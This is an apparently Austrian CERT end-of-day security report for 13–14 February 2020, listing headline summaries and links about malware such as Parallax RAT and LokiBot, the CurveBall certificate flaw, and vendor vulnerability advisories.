End-of-Day report
Timeframe: Donnerstag 13-02-2020 18:00 - Freitag 14-02-2020 18:00
Handler: Thomas Pribitzer
Co-Handler: Robert Waldner
News
Parallax RAT: Common Malware Payload After Hacker Forums Promotion
A remote access Trojan named Parallax is being widely distributed through malicious spam campaigns that when installed allow attackers to gain full control over an infected system.
https://www.bleepingcomputer.com/news/security/parallax-rat-common-malware-payload-after-hacker-forums-promotion/
Keep an Eye on Command-Line Browsers, (Fri, Feb 14th)
For a few weeks, Im searching for suspicious files that make use of a command line browser like curl.exe or wget.exe in Windows environment. Wait, you were not aware of this? Just open a cmd.exe and type 'curl.exe' on your Windows 10 host: [...]
https://isc.sans.edu/diary/rss/25804
LokiBot Impersonates Popular Game Launcher and Drops Compiled C# Code File
Recently, we discovered LokiBot (detected by Trend Micro as Trojan.Win32.LOKI) impersonating a popular game launcher to trick users into executing it on their machines. Further analysis revealed that a sample of this variant employs a quirky, installation routine that involves dropping a compiled C# code file.
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/WsiHoe_u7N4/
An In-Depth Technical Analysis of CurveBall (CVE-2020-0601)
The first Microsoft patch Tuesday of 2020 contained fixes for CVE-2020-0601 [...] an attacker exploiting this vulnerability could potentially create their own cryptographic certificates that appear to originate from a legitimate certificate that is fully trusted by Windows by default. .. this post will primarily highlight the code-level root cause analysis of the vulnerability in the context of how applications are likely to use CryptoAPI to handle certificates - more specifically in the [...]
https://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-technical-analysis-of-curveball-cve-2020-0601/
Sicherheitslücken-Sammlung SweynTooth: SocS in zahlreichen Produkten verwundbar
Zwölf Lücken in der Bluetooth-Low-Energy-Umsetzung auf Systems-on-Chip mehrerer Hersteller betreffen Wearables, IoT- aber wohl auch medizinische Geräte.
https://heise.de/-4660872
Vulnerabilities
Trend Micro AntiVirus: Schwachstelle ermöglicht Denial of Service
Trend Micro AntiVirus ist eine Anti-Viren-Software.
Trend Micro Maximum Security ist eine Desktop Security Suite.
Trend Micro Internet Security ist eine Firewall und Antivirus Lösung.
https://www.bsi-fuer-buerger.de/SharedDocs/Warnmeldungen/DE/TW/2020/02/warnmeldung_tw-t20-0031.html
Schneider Electric Modicon Ethernet Serial RTU
This advisory contains mitigations for improper check for unusual or exceptional conditions, and improper access control vulnerabilities in Schneider Electrics Modicons BMXNOR0200H Ethernet Serial RTU, a remote terminal unit.
https://www.us-cert.gov/ics/advisories/icsa-20-044-01
Schneider Electric Magelis HMI Panels
This advisory contains mitigations for an improper check for unusual or exceptional conditions vulnerability in Schneiders Magelis HMI Panels.
https://www.us-cert.gov/ics/advisories/icsa-20-044-02
FortiManager Cross-Site WebSocket Hijacking (CSWSH)
An Insufficient Verification of Data Authenticity vulnerability in FortiManager may allow an unauthenticated attacker to perform a Cross-Site WebSocket Hijacking (CSWSH) attack. FortiManager 6.2.0 to 6.2.1, 6.0.6 and below.
https://fortiguard.com/psirt/FG-IR-19-191
Security updates for Friday
Security updates have been issued by Debian (debian-security-support, postgresql-11, and postgresql-9.6), Fedora (cutter-re, firefox, php-horde-Horde-Data, radare2, and texlive-base), openSUSE (docker-runc), Oracle (kernel), Red Hat (sudo), and Ubuntu (firefox).
https://lwn.net/Articles/812494/
Bugtraq: [TZO-13-2020] - AVIRA Generic AV Bypass (ZIP GPFLAG)
http://www.securityfocus.com/archive/1/542223
Security Bulletin: Vulnerability affecting IBM Network Performance Insight (CVE-2019-12402)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-affecting-ibm-network-performance-insight-cve-2019-12402/
Security Bulletin: Vulnerability affecting IBM Network Performance Insight (CVE-2019-16335)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-affecting-ibm-network-performance-insight-cve-2019-16335/
Security Bulletin: Oct 2019 : Multiple vulnerabilities in IBM Java Runtime affect CICS Transaction Gateway
https://www.ibm.com/blogs/psirt/security-bulletin-oct-2019-multiple-vulnerabilities-in-ibm-java-runtime-affect-cics-transaction-gateway/
Security Bulletin: OpenSSL vulnerability affects IBM Rational Team Concert
https://www.ibm.com/blogs/psirt/security-bulletin-openssl-vulnerability-affects-ibm-rational-team-concert-2/
Security Bulletin: Oracle Outside In Technology vulnerability in Rational DOORS Next Generation
https://www.ibm.com/blogs/psirt/security-bulletin-oracle-outside-in-technology-vulnerability-in-rational-doors-next-generation/
Security Bulletin: Vulnerabilities affect IBM Network Performance Insight (CVE-2019-14379, CVE-2019-17531, CVE-2019-14439 and CVE-2019-14540)
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-affect-ibm-network-performance-insight-cve-2019-14379-cve-2019-17531-cve-2019-14439-and-cve-2019-14540/
Security Bulletin: Vulnerability in IBM Java Runtime affect Financial Transaction Manager for Digital Payments
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java-runtime-affect-financial-transaction-manager-for-digital-payments/
Red Hat Virtualization: Schwachstelle ermöglicht Cross-Site Scripting
http://www.cert-bund.de/advisoryshort/CB-K20-0132